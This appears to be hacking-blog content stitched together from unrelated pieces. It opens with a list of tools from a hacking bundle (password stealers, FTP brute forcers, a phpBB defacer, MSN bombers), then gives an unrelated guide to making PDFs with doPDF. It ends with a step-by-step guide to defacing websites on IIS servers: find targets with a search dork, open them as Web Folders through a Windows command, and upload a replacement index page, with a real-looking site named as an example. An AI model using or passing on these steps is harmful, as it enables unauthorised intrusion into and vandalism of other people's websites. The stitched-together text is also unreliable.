    S-H Yahoo Password Sender

    Page 4:

    NetWork Password Recovery
    NetBIOS Name Scanner
    FTP Password Hacker
    Cable Modem Sniffer
    Port Listening XP
    Blue Port Scanner
    www 2 IP
    XP Killer
    Sniff Password
    Port Scanner
    Fast Resolver
    Domain Scan
    Whois Domain
    NetRes View
    PHPbb Defacer
    Angry IP Scanner
    FTP Brute Forcer

    PAge 5:

    Hook Tool Box
    Smart HAck UpLoader
    Remote Anything
    Post Sage
    PHPbb Attacker
    Page 6:
    Skinner
    MSN Bomber Man
    Ultimate Nick PopUpz
    MSN 7 Universal Patcher
    Emoticons Creator
    MSN Picture Crawler
    Anti Status Bomb
    MSN Detector
    Multi MSN Loader
    Kitle
    Protect Lithium
    Tray It!
    MSN Block Checker
    MSN Auto Responder
    MSN Virus Cleaner
    MSN Dondurucu
    Download it from  - Hacking Tools 85 in one

    How to create PDF files for free

    PDF is the de facto standard for online reading and publishing and various softwares like Adobe reader and Foxit reader PDF is the new standard for online publishingallow you to read PDF files. But PDF creation comes under shady areas and the same softwares either allow for minor PDF modification with watermarked results (Foxit) or constitute a whole new different software package for PDF creation for a premium fee (Adobe PDF creator).However,for professionals,this software may be worth its price tag,general users can create excellent looking PDF’s by the method described before.
    What you need -
    About DoPDF (shamelessly taken from official website :P) -Create PDF's easily with DoPDF
    doPDF is a free PDF converter for both personal and commercial use. Using doPDF you can create PDF files by selecting the "Print" command from virtually any application. With one click you can convert your Microsoft Excel, Word or  PowerPoint documents or your emails and favorite web sites to PDF files.
    Steps to create PDF -
    • Download DoPDF and install it.
    • Open your word processor/text editor and create your document.
    • Press Ctrl + P or go to File menu and print the document.
    • The Print menu will open,choose DoPDF as virtual Printer and click on Print.
    choose DoPDF as virtual Printer and click on Print.
    • Choose the location for your document to save and click OK.Your PDF file will be created.
    Choose the location for saving your document
    • Congratulations..you have created your PDF file for free .

    Deface sites easily in Seconds




    #it only works on sites being hosted on Ms-IIS server. Now a days many boxes are patched so it'll not work on them !!

    steps for Xp-

    # open run
    # type-

    %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

    and press enter !

    #A new window name "WEB FOLDER" gets open

    #Right click and click on New, Add Web Folder then enter your vulnerable website address.

    #then next....finish

    # now You can insert your page with name index.html by simply copy pasting.

    Also after getting access to the website...Many websites don't allows you to
    add your page. so leave them.




    #Dork- "Powered by IIS" or use your own unique dork.


     ------------------------------------------------------------------------------------------------------------

    Windows 7-

    #Click Start.

    #Click Computer.

    # In the following dialog click Map Network Drive.

    # On the Map Network Drive dialog, click "Connect to a Web site that you can use to store your documents and Pictures" this will pop up the "Welcome to the Add Network Location Wizard".



    # Click on Next.



    # Click on ''Choose a custom network location''.



    # Click on Next.



    # Now type the web folder address that you want to access. For instance: www.stscw.com/



    # Enter a NAME to help you identify the web folder and click Next.



    # Place a checkmark on 'Open this network location when I click finish'.



    # Click Finish.

    and insert your deface page !!



    ----------------------------------------------------------------------------------------------------------------


    Reference-

    3thicaln00b (super moderator)
    IndiShell Crew